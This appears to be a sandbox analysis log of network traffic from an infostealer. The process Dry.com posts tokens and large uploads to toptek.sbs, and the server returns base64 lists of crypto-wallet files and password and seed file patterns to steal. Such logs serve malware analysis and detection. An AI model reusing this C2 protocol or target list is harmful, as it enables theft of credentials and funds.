                                                                                                                                                                                                                                                                                  2024-12-23 05:22:00 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:22:01 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  21192.168.2.44977994.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:01 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----WL6PZMY5PH4EUAAI58YM
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 6990993
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:01 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 57 4c 36 50 5a 4d 59 35 50 48 34 45 55 41 41 49 35 38 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 50 5a 4d 59 35 50 48 34 45 55 41 41 49 35 38 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 50 5a 4d 59 35 50 48 34 45 55 41 41 49 35 38 59 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------WL6PZMY5PH4EUAAI58YMContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------WL6PZMY5PH4EUAAI58YMContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------WL6PZMY5PH4EUAAI58YMCont
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:22:08 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  22192.168.2.44978594.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:03 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----79R16XLF3EKN7YCBAAIW
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:03 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 37 39 52 31 36 58 4c 46 33 45 4b 4e 37 59 43 42 41 41 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 37 39 52 31 36 58 4c 46 33 45 4b 4e 37 59 43 42 41 41 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 37 39 52 31 36 58 4c 46 33 45 4b 4e 37 59 43 42 41 41 49 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------79R16XLF3EKN7YCBAAIWContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------79R16XLF3EKN7YCBAAIWContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------79R16XLF3EKN7YCBAAIWCont
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:22:03 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:04 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                  Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  23192.168.2.44979194.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:05 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----UKX479HVAI58YMYMYU37
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:05 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 39 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 39 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 39 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------UKX479HVAI58YMYMYU37Content-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------UKX479HVAI58YMYMYU37Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------UKX479HVAI58YMYMYU37Cont
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:22:06 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:06 UTC1324INData Raw: 35 32 30 0d 0a 63 6d 56 74 62 33 5a 68 59 6d 78 6c 66 43 56 45 55 6b 6c 57 52 56 39 53 52 55 31 50 56 6b 46 43 54 45 55 6c 58 48 77 71 4c 6e 52 34 64 43 77 71 4c 6e 70 70 63 43 77 71 4c 6e 4a 68 63 69 77 71 4c 6d 52 68 64 43 77 71 64 32 46 73 62 47 56 30 4b 69 34 71 4c 43 70 69 61 58 52 6a 62 32 6c 75 4b 69 34 71 4c 43 70 69 64 47 4d 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 57 52 74 61 57 34 71 4c 69 6f 73 4b 6e 5a 68 62 47 6c 6b 4b 69 34 71 4c 43 70 77 59 58 4e 7a 64 32 39 79 5a 43 6f 75 4b 69 77 71 62 57 39 75 5a 58 6b 71 4c 69 6f 73 4b 6e 4a 6b 63 43 6f 75 4b 69 77 71 63 32 56 79 64 6d 56 79 4b 69 34 71 4c 43 70 6d 62 33 4a 31 62 53 6f 75 4b 69 77 71 63 32 68 76 63 43 6f 75 4b 69 77 71 62 57
                                                                                                                                                                                                                                                                                  Data Ascii: 520cmVtb3ZhYmxlfCVEUklWRV9SRU1PVkFCTEUlXHwqLnR4dCwqLnppcCwqLnJhciwqLmRhdCwqd2FsbGV0Ki4qLCpiaXRjb2luKi4qLCpidGMqLiosKnNlZWQqLiosKmNyeXB0byouKiwqYWRtaW4qLiosKnZhbGlkKi4qLCpwYXNzd29yZCouKiwqbW9uZXkqLiosKnJkcCouKiwqc2VydmVyKi4qLCpmb3J1bSouKiwqc2hvcCouKiwqbW


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
